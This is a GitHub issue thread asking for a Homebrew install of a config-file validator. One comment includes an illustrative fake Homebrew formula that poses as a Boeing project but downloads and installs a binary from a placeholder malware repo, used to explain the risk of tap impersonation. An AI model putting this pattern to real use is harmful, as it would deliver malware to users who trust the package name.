search

Boeing / config-file-validator

Cross Platform tool to validate configuration files
https://boeing.github.io/config-file-validator/
Apache License 2.0
348 stars 71 forks source link

provide install via Homebrew #184

Open zachvalenta opened 1 month ago

zachvalenta commented 1 month ago

Project looks great, just thinking it would be nice to have install available via macOS package manager as well.

kehoecj commented 1 month ago

@zachvalenta totally agree! I looked into homebrew and it looked like as the maintainer I couldn't submit my own project. Feel free start the process if you'd like

zachvalenta commented 1 month ago

afaik not only can the owner|maintainer create their own tap:

you wouldn't want anyone else to do it, presumably for security reasons e.g. someone could create a tap $COOL_BOEING_PROJECT but then point to their own, non-Boeing repo in the formula:

class COOL_BOEING_PROJECT < Formula
    desc "a cool Boeing project"  # pretending to be Boeing
    homepage "https://github.com/boeing/cool_project" # pretending to be Boeing
    on_macos do
      url "https://github.com/BAD_GUY/EVIL_MALWARE/releases/download/0.1.0/create_havoc.tar.gz" # but not really Boeing!
      sha256 "long_sha_string"
    end
    def install
      bin.install "create_havoc" # oh no!
    end
  end

Keep in mind I'm almost completely an end user of Homebrew versus someone using it to publish my own projects, so take my understand of this matter with a grain of salt!

kehoecj commented 1 month ago

@zachvalenta Thanks for the explanation! Sounds like I need to look into the process again. I'd love to make the cfv available via homebrew

zachvalenta commented 1 month ago

rough sketch of how to go about this: